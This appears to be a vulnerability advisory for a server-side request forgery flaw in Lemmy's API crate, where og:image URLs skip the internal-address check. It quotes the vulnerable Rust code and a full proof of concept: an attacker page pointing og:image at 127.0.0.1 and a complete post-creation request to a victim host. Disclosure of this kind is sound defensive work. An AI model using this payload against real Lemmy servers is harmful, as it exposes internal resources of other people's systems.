PT-2026-36864 · Crates.Io · Lemmy Api Common
Published
2026-04-24
·
Updated
2026-04-24
CVSS v3.1
6.5
Medium
| Vector | AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N |
Summary
Lemmy fetches metadata for user-supplied post URLs and, under the default
StoreLinkPreviews image mode, downloads the preview image through local pict-rs. While the top-level page URL is checked against internal IP ranges, the extracted og:image URL is not subject to the same restriction.As a result, an authenticated low-privileged user can submit an attacker-controlled public page whose Open Graph image points to an internal image endpoint. Lemmy will fetch that internal image server-side and store a local thumbnail that can then be served back to users.
Details
The metadata fetch logic applies an internal-address check only to the initial post URL. After HTML parsing,
extract opengraph data() accepts absolute og:image values and returns them as-is. Later, generate post link metadata() passes that second-hop image URL into generate pictrs thumbnail(), which instructs local pict-rs to fetch it through image/download?url=....This creates a two-stage source-to-sink chain where the first URL is constrained, but the security boundary is bypassed through an unvalidated secondary resource.
Core vulnerable code path:
rust
// crates/api common/src/request.rs
let metadata = match &post.url {
Some(url) => fetch link metadata(url, &context, false).await.unwrap or default(),
=> Default::default(),
};rust
// crates/api common/src/request.rs
let og image = page
.opengraph
.images
.first()
.and then(|ogo| url.join(&ogo.url).ok());rust
// crates/api common/src/request.rs
let thumbnail url = if let (true, Some(url)) = (allow generate thumbnail, image url.clone()) {
generate pictrs thumbnail(&url, &context).await.ok().map(Into::into).or(image url)
} else {
image url.clone()
};rust
// crates/api common/src/request.rs
let fetch url = format!(
"{}image/download?url={}&resize={}",
pictrs config.url,
encode(image url.as str()),
context.settings().pictrs config()?.max thumbnail size
);These snippets show that only the outer page URL is checked, while the extracted
og:image value becomes a server-side fetch target without an equivalent internal-address guard.PoC
Prerequisites:
- The attacker has a valid low-privileged account.
- The instance uses the default link preview storage mode.
- The attacker can post a link to a community they can access.
Practical reproduction flow:
- Host a public HTML page under attacker control.
- Add an Open Graph image tag whose value points to an internal image URL reachable from the Lemmy host, such as
http://127.0.0.1:8081/internal.png. - Create a Lemmy post whose
urlis the attacker-controlled page. - Observe Lemmy fetch the public page, extract
og:image, and then fetch the internal image through pict-rs. - Observe the created post receive a local thumbnail URL, demonstrating that the internal image was retrieved and cached.
Complete PoC attacker page:
html
<html><head>
<meta property="og:image" content="http://127.0.0.1:8081/internal.png">
</head><body>x</body></html>Complete PoC request:
http
POST /api/v3/post HTTP/1.1
Host: victim.example
Authorization: Bearer <low-priv-jwt>
Content-Type: application/json
{
"name": "thumb-ssrf",
"community id": 1,
"url": "https://attacker.example/og.html",
"body": null,
"alt text": null,
"honeypot": null,
"nsfw": false,
"language id": null,
"custom thumbnail": null
}Outcome:
- The post creation request succeeds.
- The internal image endpoint receives a request from the Lemmy server.
- The created post is updated with a local
thumbnail url, indicating that the internal image was fetched and cached.
Impact
This issue upgrades an attacker-controlled external page into an internal image fetch primitive. It can be used to retrieve internal image resources, expose content that is otherwise reachable only from the application host, and publish those internal resources through Lemmy's own thumbnail serving path.
Because the vulnerable mode is the documented default behavior for link previews, the issue is relevant even without non-default privacy settings.
Fix
SSRF
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Lemmy Api Common